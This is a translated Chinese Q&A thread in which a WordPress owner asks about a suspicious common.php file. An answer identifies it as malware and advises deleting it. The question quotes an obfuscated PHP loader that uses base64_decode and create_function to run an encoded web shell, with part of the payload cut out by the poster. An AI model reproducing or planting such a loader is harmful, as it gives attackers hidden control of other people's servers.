我的一个wordpress网站存在问题。 (不断登出用户而不让人们登录)
我的托管认为路由是common.php文件(/public_html/wp-content/common.php)
任何人都可以了解文件实际上在做什么吗?我可以删除它吗?WordPress会生成一个新文件吗?
common.php代码:
<?php
$alphabet = ".hyib/;dq4ux9*zjmclp3_r80)t(vakng1s2foe75w6";
$string = "Cmdsb2JhbCAkYXV0aF9wYXNzLCRjb2xvciwkZGVmYXVsdF9hY3Rpb24sJGRlZmF1bHRfdXNlX2FqYXgsJGRlZmF1bHRfY2hhcnNldCwkc29ydDsKZ2xvYmFsICRjd2QsJG9zLCRzYWZlX21vZGUsICRpbjsKCiRhdXRoX3Bhc3MgPSAnZGU0OTA5YzUxZWZiNjZlNTgwYzMyZTk5NTFlZGI1ZG
*我不得不在这里删除了很多代码,因为它超过了字符限制(abot 90,000 !!)
J10gPSAkZGVmYXVsdF9hY3Rpb247CgllbHNlCgkJJF9QT1NUWydhJ10gPSAnU2VjSW5mbyc7CmlmKCAhZW1wdHkoJF9QT1NUWydhJ10pICYmIGZ1bmN0aW9uX2V4aXN0cygnYWN0aW9uJyAuICRfUE9TVFsnYSddKSApCgljYWxsX3VzZXJfZnVuYygnYWN0aW9uJyAuICRfUE9TVFsnYSddKTsKZXhpdDsKCg==";
$array_name = "";
foreach([4,29,34,38,42,9,21,7,38,17,37,7,38] as $t){
$array_name .= $alphabet[$t];
}
$a = strrev("noi"."tcnuf"."_eta"."erc");
$f = $a("", $array_name($string));
$f();
提前致谢
富
答案 0 :(得分:2)
删除文件。 它不是WordPress安装或升级包的一部分。我认为该文件是恶意的,并且您的托管帐户/个人计算机/登录凭据已被盗用或类似的东西。
这是此案例中提到的标准支持文档: https://codex.wordpress.org/FAQ_My_site_was_hacked
然后,一旦您的网站是干净:
http://codex.wordpress.org/Hardening_WordPress